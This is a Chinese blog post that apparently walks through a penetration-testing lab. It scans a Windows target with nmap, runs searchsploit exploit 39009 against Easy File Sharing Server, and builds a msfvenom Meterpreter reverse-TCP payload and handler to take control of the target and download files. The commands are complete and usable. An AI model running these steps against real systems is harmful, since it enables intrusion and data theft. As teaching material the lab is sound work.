简单漏洞复现_网络渗透测试

最新推荐文章于 2024-05-20 14:15:00 发布
最新推荐文章于 2024-05-20 14:15:00 发布
阅读量1.5k 收藏 8
点赞数
文章标签: 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Radiency/article/details/128004227
版权

一、漏洞渗透测试
1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。
2、利用Nmap扫描发现靶机(Windows)运行了该服务。
3、利用该漏洞,使得靶机运行计算器。

获取easy file sharing server

链接:https://pan.baidu.com/s/1WRasVlAb_st--7ZeOkwNVQ 
提取码:1vx1

主要步骤

1.使用nmap扫描同一子网下的主机,扫描发现 靶机 ip:192.168.88.131

2. 输入命令 nmap -sV -o easy-file.txt 192.168.88.131将扫描靶机上服务的版本记录在easy-file.txt文件里。-sV   探测服务/版本信息  -o 输出

 

3.得知靶机运行的服务,随后使用命令:searchsploit easy file sharing ,该命令可以搜索到标题和路径中包含“easy file sharing”的所有内容

选用39009的脚本searchsploit -m 39009

4.输入命令 python2  <Path> (上一步所得的路径) 192.168.10.128(靶机ip 80easy file sharing的端口)

Done表示已完成 回到windows,计算器已打开。

 

二、Metasploit应用
1、生成主控端、被控端。
2、获得靶机(Windows)控制权。
3、下载靶机上任意一个文件。

主要步骤:

1.生成被控端

在root终端输入命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.88.128 lport=5000 -f exe -o /var/payload.exe

  将在file system/var目录下生成payload.exe文件,并把这个生成的被控端复制到靶机中

2.启动主控端

在终端中输入 msfconsole  以启动 Metasploit

在Metasploit中使用 handler 来作为主控端   命令为 use exploit/multi/handler

然后设置攻击载荷(被控端)为 windows/meterpreter/reverse_tcp,设置 lhost 为 192.168.88.128(本地主机即攻击机IP),设置 lport (本地端口)为 5000。再次输入exploit,运行。之后会等待对方上线。

 然后在靶机上双击打开payload.exe,启动这个被控端。再返回kali就会看到在Metasploit中打开了一个session,表示现在可以通过被控端来控制靶机了。

使用命令ls 查看当前目录下的文件

 输入download test.txt(要下载的文件) C:\Documents and Settings\Administrator\桌面(文件路径)

 

Radiency
关注
  • 0
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
配置DNS服务器样例虚拟机,DNS主从服务器配置实战解析及案例
weixin_27015733的博客
08-05 1491
DNS主服务器:192.168.88.131从服务器:192.168.88.130总结:主从复制(注意点):1、应该为一台独立的名称服务器;2、主服务器的区域解析库文件中必须有一条NS记录是指向从服务器;3、从服务器只需定义区域,而无需提供解析库文件;解析库文件应该放置于/var/named/slaves/目录中4、主服务器得允许从服务器作区域传送5、主从服务器时间应该同步,可通过ntp进行,6、...
Redis 未授权访问 CNNVD-201511-230 漏洞复现
Senimo
05-03 1854
CNNVD-201511-230 Redis 未授权访问漏洞一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接六、利用工具 一、漏洞描述 Redis 是美国 RedisLabs 公司赞助的一套开源的使用 ANSIC 编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的 API。Redis 中存在未授权访问漏洞,该漏洞源于程序在默认配置下会绑定在 6379 端口,这导致其直接暴露在公网中,可以接受来自任何地址发来的请求。当程序
网络安全---漏洞复现】shiro550反序列化漏洞原理与漏洞复现和利用(基于vulhub,保姆级的详细教程)
m0_67844671的博客
09-21 4235
shiro550反序列化漏洞原理与漏洞复现和利用(基于vulhub,保姆级的详细教程);Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序;
一次历史漏洞分析与复现的全部过程
最新发布
qkh1234567的博客
05-20 673
可以看到文件名没有做安全处理,执行到 fos.write 时 shell.war 就被写入到 tomcat 的 webapps 目录了,这里的目录名不太对劲,因为是在 IDEA 启动 SpringBoot 进行调试的,无须在意,分析到这里就结束了。查看如何访问 sys_member_space.html,可以看到文件名被定义为常量,space 方法使用了该常量,也就是说访问路径的格式为 /space/{id} 时就能触发 XSS 了。我们试一下,发现响应 404 文件不存在,并且文件路径前加了 /jsp。
简单漏洞渗透复现
cherry70的博客
12-22 967
注意事项:想要实现Metasploit的具体应用,需要靶机运行payload.exe这个kali生成的执行文件,将kali中的payload.exe移到靶机中的相关方法,可以在网上搜查,我的虚拟机不能直接利用VMtools直接移动,所以我是利用网站来下载的。Metasploit框架是可以添加漏洞代码片段,就好比一个军火库,它里面有各种武器供大家使用,当然也有新的武器被研发出来,放到武器库里面后,都可以使用,这就是框架的好处,新的攻击代码可以比较容易的加入MSF框架供大家使用。
log4j漏洞复现
weixin_68647219的博客
04-20 4576
2021年12月8号爆出的log4j2的远程代码执行漏洞【cve-2021-44228】,堪称史诗级核弹漏洞,虽然过了这么久,大部分现网中的相关漏洞已经修复,但任然可以捡漏…,网上也有不少大佬和研究机构都对该漏洞做了分析和复盘,年前年后比较忙,一直没有好好的分析总结该漏洞,最近学习下刚好补上。
毒蛇:metasploit-framework图形界面图形化内网渗透工具
02-01
5. **自动化工作流**:Viper支持自动化渗透测试流程,如批量扫描、漏洞利用和报告生成,提高了工作效率。 6. **数据可视化**:通过图表和图形,Viper帮助分析测试结果,快速理解网络状况。 三、Metasploit与Viper...
Metasploitable_ubuntu-book.zip
07-14
4. **漏洞复现**:根据实际的漏洞报告,尝试复现攻击过程,理解漏洞的成因和影响。 5. **防护策略**:学习如何防止此类攻击,包括正确配置Samba,定期更新补丁,以及实施强密码政策等。 6. **应急响应**:了解一旦...
WSockExpert抓包工具
08-07
4. **数据拦截与修改**:在渗透测试中,WSockExpert可以拦截并修改网络数据包,比如篡改请求参数或响应内容,以测试应用程序的漏洞。这对于模拟攻击场景,验证服务器安全策略的有效性至关重要。 5. **会话保存与...
Metasploit 实现木马生成、捆绑及免杀-内含源码以及设计说明书(可以自己运行复现).zip
05-08
Metasploit 是一个开源的安全漏洞测试框架,广泛用于渗透测试安全研究。本教程将深入探讨如何利用 Metasploit 来创建、捆绑木马以及实现免杀技术。通过源码分析和设计说明书,您可以自己运行并复现这些过程,从而...
RedTeam视角下的二进制攻防研究.pptx
10-15
具备安全事件分析、漏洞复现和实现能力,以及良好的团队合作精神也是重要条件。具有渗透大型目标经验、熟悉业界安全攻防动态、编写过实用工具或有CTF比赛获奖经历者将更具优势。 总结来说,"RedTeam视角下的二进制...
Wordpress漏洞复现
weixin_52194536的博客
09-10 8824
cms漏洞
渗透测试之路:ThinkPHP漏洞复现
m0_68353775的博客
01-10 2311
其实ThinkPH框架漏洞大多用到的都是设置对于控制器名的一个疏忽问题,不理解的小伙伴可以查来url调用文件的机制来学习一下,其实这些框架漏洞都是基于基础漏洞的一些拓展,至于sql漏洞,了解一下pdo预编译原理即可。不管java或是php在进行数据库查询的时候都应该进行pdo预编译,我们都知道,在jdbc工作的时候分成好多步1.建立连接2.写入sql语句3.预编译sql语句4.设置参数5.执行sql获取结果6.遍历结果(处理结果)7.关闭连接。
Windows网络服务渗透测试实战MS17-010漏洞复现
c_lanxiaofang的博客
05-16 3380
一、实验项目名称 Windows网络服务渗透测试实战MS17-010漏洞复现 二、实验目的及要求 熟悉Metasploit终端的使用方法; 掌握对MS17-010漏洞攻击的方法。 三、复现步骤(附加文字说明加截图) 1、NAT模式 Kali-Linux :192.168.232.141 Windows 7: 192.168.232.142 2、查看ip kali:ip a win7:ipconfig 3、重启网卡 service networking restart 4、测试是否连通 k
永恒之蓝漏洞复现过程
hhf小菜鸡的博客
05-12 648
漏洞复现过程 1.准备一台kali虚拟机,一台windows7 2.打开kali,查看kali的IP地址,命令:ifconfig 3.知道kali的IP地址为:192.168.43.116之后使用kali自带的nmap网络扫描工具扫描192.168.43.0网段下存活的主机,命令:nmap -sS 192.168.43.0/24 在这里我选择了IP地址为192.168.43.67的主机作为我的漏洞利用对象,因为我觉得他的主机端口开放的最多,成功的几率比较大,而且它的445端口也是开放的 4.接下来可以看看这
漏洞复现篇——利用vulhub模拟Weblogic的SSRF漏洞
爱国小白帽
01-15 3175
SSRF漏洞:SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由恶意访问者构造形成由服务端发起请求的一个安全漏洞。 一般情况下,SSRF访问的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。...
vulhub漏洞复现系列之aria2任意文件写入漏洞
weixin_43071873的博客
12-08 742
我的天,这个漏洞复现,你看了我的博客之后你再说不会复现我揍你我跟你讲!(狗头保命) 工具介绍: Aria2是一个命令行下轻量级、多协议、多来源的下载工具(支持 HTTP/HTTPS、FTP、BitTorrent、Metalink),内建XML-RPC和JSON-RPC接口。在有权限的情况下,我们可以使用RPC接口来操作aria2来下载文件,将文件下载至任意目录,造成一个任意文件写入漏洞漏洞描述: 通过控制文件下载链接,文件储存路径以及文件名,可以实现任意文件写入。同时通过Aria2提供的其他功能,诸
Heartbleed漏洞复现与利用
biziwaiwai的博客
02-13 5176
一、      1.Heartbleed漏洞是什么Openssl在处理心跳包的时候检测漏洞,没有检测payload与实际的数据字段是否匹配,造成最大64KB的内存泄漏2.基本背景和影响OpenSSL是SSL协议以及一系列加密算法的开源实现,使用C语言编写。OpenSSL采用Apache开源协议,可以免费用于商业用途,在很多linux发行版和服务器中得到广泛应用。OpenSSL出现漏洞造成的影响是巨...
2. 漏洞复测系列 -- SSH 支持弱加密算法漏洞(SSH Weak Algorithms Supported)
热门推荐
Peter 的博客
01-16 3万+
本系列文章旨在对于有一定网络安全基础的人员,在日常工作中扫描出来的各种漏洞,如何进行验证,以区分该漏洞是否存在或是扫描器误报。请勿应用非法途径。 一、漏洞描述 SSH的配置文件中加密算法没有指定,默认支持所有加密算法,包括arcfour,arcfour128,arcfour256等弱加密算法。 这个漏洞属于SSH的配置缺陷,SSH服务启用了Arcfour (也称RC4)这个不安全算法。 二、...
网络安全漏洞复现kali
08-16
你可以通过以下步骤在Kali Linux上复现网络安全漏洞: 1. 安装Kali Linux:首先,从Kali Linux官方网站上下载并安装Kali Linux的最新版本。确保你的系统满足硬件要求,并按照官方指南进行安装。 2. 更新系统:安装完成后,打开终端并使用以下命令更新系统软件包: ``` sudo apt update sudo apt upgrade ``` 3. 选择漏洞和工具:根据你想要复现的具体漏洞,选择合适的工具。例如,如果你想复现Web应用程序的漏洞,可以使用Burp Suite或OWASP ZAP来进行渗透测试。 4. 设置实验环境:在复现漏洞之前,建议你在虚拟环境中设置一个实验环境。你可以使用虚拟机软件(如VirtualBox)创建一个虚拟机,并在其中安装你想要测试的目标应用程序。 5. 扫描目标:使用选定的工具对目标应用程序进行扫描,以寻找可能的漏洞。这些工具通常提供了各种扫描和攻击功能,可以帮助你发现潜在的漏洞。 6. 复现漏洞:一旦你找到了漏洞,你可以使用相应的工具和技术来尝试复现它。这可能涉及到发送特定的请求、利用漏洞或执行其他攻击方法。 7. 记录结果:在复现漏洞的过程中,务必详细记录你的操作和结果。这对于后续的分析和报告非常重要。 请注意,在进行任何网络安全测试之前,确保你已经获得了合法的授权,并遵守适用的法律和道德准则。此外,仅在你拥有合适的技术知识和经验的情况下进行漏洞复现,以避免对目标系统造成不必要的损害。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值